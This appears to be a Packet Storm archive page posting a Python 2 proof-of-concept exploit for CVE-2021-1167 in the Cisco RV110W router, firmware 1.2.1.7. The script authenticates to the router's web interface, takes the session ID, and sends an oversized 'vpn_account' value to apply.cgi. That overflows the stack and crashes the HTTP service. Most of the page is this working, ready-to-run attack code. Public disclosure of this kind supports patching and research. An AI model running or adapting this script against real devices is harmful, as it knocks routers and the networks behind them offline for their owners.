what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Cisco RV110W 1.2.1.7 Denial Of Service

Cisco RV110W 1.2.1.7 Denial Of Service
Posted Jan 14, 2021
Authored by Shizhi He

Cisco RV110W version 1.2.1.7 vpn_account denial of service proof of concept exploit.

tags | exploit, denial of service, proof of concept
systems | cisco
advisories | CVE-2021-1167
SHA-256 | d17a98598deaf9e49e4b5b6d4987373b9fff15aa4200a8930baafc922e80ba62

Cisco RV110W 1.2.1.7 Denial Of Service

Change Mirror Download
# Exploit Title: Cisco RV110W 1.2.1.7 - 'vpn_account' Denial of Service (PoC)
# Date: 2021-01
# Exploit Author: Shizhi He
# Vendor Homepage: https://www.cisco.com/
# Software Link: https://software.cisco.com/download/home/283879340/type/282487380/release/1.2.1.7
# Version: V1.2.1.7
# Tested on: RV110W V1.2.1.7
# CVE : CVE-2021-1167
# References:
# https://github.com/pwnninja/cisco/blob/main/vpn_client_stackoverflow.md
# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U

#!/usr/bin/env python2

#####
## Cisco RV110W Remote Stack Overflow.
### Tested on version: V1.2.1.7 (maybe useable on other products and versions)


import os
import sys
import re
import urllib
import urllib2
import getopt
import json
import hashlib
import ssl

ssl._create_default_https_context = ssl._create_unverified_context

###
# Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco
# This PoC will crash the target HTTP/HTTPS service
###

#encrypt password
def enc(s):
l = len(s)
s += "%02d" % l
mod = l + 2
ans = ""
for i in range(64):
tmp = i % mod
ans += s[tmp]
return hashlib.md5(ans).hexdigest()

if __name__ == "__main__":
print "Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco"

IP = sys.argv[1]
PORT = sys.argv[2]
USERNAME = sys.argv[3]
PASSWORD = enc(sys.argv[4])
url = 'https://' + IP + ':' + PORT + '/'

#get session_id by POST login.cgi
req = urllib2.Request(url + "login.cgi")
req.add_header('Origin', url)
req.add_header('Upgrade-Insecure-Requests', 1)
req.add_header('Content-Type', 'application/x-www-form-urlencoded')
req.add_header('User-Agent',
'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
req.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
req.add_header('Referer', url)
req.add_header('Accept-Encoding', 'gzip, deflate')
req.add_header('Accept-Language', 'en-US,en;q=0.9')
req.add_header('Cookie', 'SessionID=')
data = {"submit_button": "login",
"submit_type": "",
"gui_action": "",
"wait_time": "0",
"change_action": "",
"enc": "1",
"user": USERNAME,
"pwd": PASSWORD,
"sel_lang": "EN"
}
r = urllib2.urlopen(req, urllib.urlencode(data))
resp = r.read()
login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1]
session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1]
print session_id

#trigger stack overflow through POST vpn_account parameter and cause denial of service
req2 = urllib2.Request(url + "apply.cgi;session_id=" + session_id)
req2.add_header('Origin', url)
req2.add_header('Upgrade-Insecure-Requests', 1)
req2.add_header('Content-Type', 'application/x-www-form-urlencoded')
req2.add_header('User-Agent',
'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
req2.add_header('Referer', url)
req2.add_header('Accept-Encoding', 'gzip, deflate')
req2.add_header('Accept-Language', 'en-US,en;q=0.9')
req2.add_header('Cookie', 'SessionID=')
poc = "a" * 4096
data_cmd = {
"gui_action": "Apply",
"submit_type": "",
"submit_button": "vpn_client",
"change_action": "",
"pptpd_enable": "0",
"pptpd_localip": "10.0.0.1",
"pptpd_remoteip": "10.0.0.10-14",
"pptpd_account": "",
"vpn_pptpd_account": "1",
"vpn_account": poc,
"change_lan_ip": "0",
"netbios_enable": "0",
"mppe_disable": "0",
"importvpnclient": "",
"browser": "",
"webpage_end": "1",
}
r = urllib2.urlopen(req2, urllib.urlencode(data_cmd))
resp = r.read()
print resp
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close